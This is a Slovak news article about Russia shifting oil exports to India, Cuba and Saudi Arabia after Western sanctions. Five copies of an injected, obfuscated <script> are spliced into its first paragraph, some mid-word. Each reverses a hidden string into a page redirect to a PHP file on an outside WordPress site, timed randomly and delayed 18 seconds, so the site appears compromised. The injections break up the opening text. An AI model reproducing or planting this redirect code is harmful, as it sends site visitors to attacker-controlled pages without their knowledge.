Rusko zvyšuje vývoz ropy <script>$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>do krajín mimo Európskej únie. Napríklad na Kubu alebo <script>$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>do Saudskej Arábie. Sankcie uvalené Zápa<script>$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>dom na <script>$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>dovoz ruskej ropy prinútili Ruskú federáciu hľadať alternatívnych odberateľov tejto strategickej komodity. A Kremeľ bol relatívne úspešný. India, Kuba a Saudská Arábia hlásia zvýšený <script>$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>dovoz ruskej ropy.

Rusko zvyšuje vývoz ropy do krajín mimo Európskej únie. Napríklad na Kubu alebo do Saudskej Arábie

Sankcie uvalené Západom na dovoz ruskej ropy prinútili Ruskú federáciu hľadať alternatívnych odberateľov tejto strategickej komodity. A Kremeľ bol relatívne úspešný. India, Kuba a Saudská Arábia hlásia zvýšený dovoz ruskej ropy.

Kupujúci ruskej ropy sa menia

K Číne a Indii, ktoré výrazne zvýšili nákup ropy z Ruska, sa postupne pridávajú ďalšie krajiny. Rusko sa tak snaží čeliť sankciám, ktoré naň uvalil Západ. V prípade ropy sa očakáva, že dovoz do Európskej únie klesne do konca tohto roka najmenej o dve tretiny, pričom niektoré členské štáty EÚ-27 sa dokonca chcú vzdať 90 % alebo všetkej ropy z Ruska.

Saudská Arábia by mohla využívať ruskú ropu

Rusko však výrazne zvýšilo vývoz svojej strategickej suroviny napríklad do Saudskej Arábie, ktorá v druhom štvrťroku odobrala z Ruska dvakrát viac ropy v porovnaní s dlhodobým priemerom. Krajina ho chce využívať na výrobu elektrickej energie, po ktorej je každé leto čoraz väčší dopyt v dôsledku zvýšených požiadaviek na klimatizáciu v uzavretých priestoroch.

Saudi nakupujú ruskú ropu za oveľa nižšiu cenu, než je na svetových trhoch bežné. V posledných dňoch sa zvýšil aj vývoz ruskej ropy na ostrov Kuba. Zvýhodnené ceny čierneho zlata využíva aj Kuba, ktorá pomáha vytrhnúť tŕň z päty Rusku.

2 komentáre

Přidat komentář

Vaša e-mailová adresa nebude zverejnená. Vyžadované polia sú označené *